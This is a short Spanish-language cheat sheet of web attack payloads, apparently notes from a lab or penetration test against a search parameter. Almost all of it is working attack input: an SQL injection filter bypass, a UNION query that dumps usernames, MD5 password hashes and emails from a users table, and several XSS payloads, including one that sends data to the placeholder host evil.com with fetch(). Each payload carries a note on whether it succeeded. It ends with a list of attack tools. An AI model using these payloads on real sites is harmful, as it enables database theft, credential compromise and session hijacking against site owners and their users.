# Ver todos los clientes (bypass del filtro)
?q=' OR '1'='1
# Extraer tabla users con UNION
?q=' UNION SELECT id,username,password_md5,email,role,created_at,7,8 FROM users--
# XSS basico (FUNCIONA - el alert se ejecuta)
?q=<script>alert('XSS ejecutado!')</script>
# XSS robo de cookie (FALLA - cookie es HttpOnly)
?q=<script>alert(document.cookie)</script>
# Resultado: cookie vacia porque es HttpOnly
# XSS exfiltracion (BLOQUEADO por CSP)
?q=<script>fetch('http://evil.com/steal?data=test')</script>
# Resultado: CSP bloquea la conexion externa
Herramientas:
SQLMap
Burp Suite
curl